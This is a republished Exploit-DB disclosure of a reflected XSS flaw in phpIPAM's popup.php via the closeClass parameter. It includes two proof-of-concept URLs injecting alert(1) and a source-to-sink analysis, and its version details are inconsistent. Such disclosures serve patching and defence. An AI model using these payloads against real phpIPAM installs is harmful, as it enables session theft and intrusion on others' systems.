[webapps] phpIPAM 1.6 - Reflected Cross Site Scripting (XSS)
phpIPAM 1.6中存在反射型XSS漏洞,通过popup.php中的closeClass参数可注入脚本。攻击者可通过构造恶意URL触发弹窗或执行其他恶意操作。该漏洞源于closeClass参数未经过滤直接输出到HTML属性中。 2025-4-11 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:3 收藏
phpIPAM 1.6中存在反射型XSS漏洞,通过popup.php中的closeClass参数可注入脚本。攻击者可通过构造恶意URL触发弹窗或执行其他恶意操作。该漏洞源于closeClass参数未经过滤直接输出到HTML属性中。 2025-4-11 00:0:0 Author: www.exploit-db.com(查看原文) 阅读量:3 收藏
# Exploit Title: [phpIPAM 1.6 Reflected XSS via closeClass Parameter in popup.php]
# Date: [2024-10-26]
# Exploit Author: [CodeSecLab]
# Vendor Homepage: [https://github.com/phpipam/phpipam]
# Software Link: [https://github.com/phpipam/phpipam]
# Version: [1.5.1]
# Tested on: [Ubuntu Windows]
# CVE : [CVE-2023-24657]
PoC:
1)http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
2)http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22
Details:
{
"Sink": "print @$_REQUEST['closeClass']",
"Vulnerable Variable": "closeClass",
"Source": "$_REQUEST['closeClass']",
"Sanitization Mechanisms Before Patch": "None",
"Sink Context Constraints": "Reflected within HTML attributes without escaping",
"Attack Payload": "\" onclick=\"alert(1)\"",
"Execution Path Constraints": "Directly accessed from the 'closeClass' parameter without modification",
"Request URL": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22",
"Request Method": "GET",
"Final PoC": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22"
}
[Replace Your Domain Name]
文章来源: https://www.exploit-db.com/exploits/52176
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh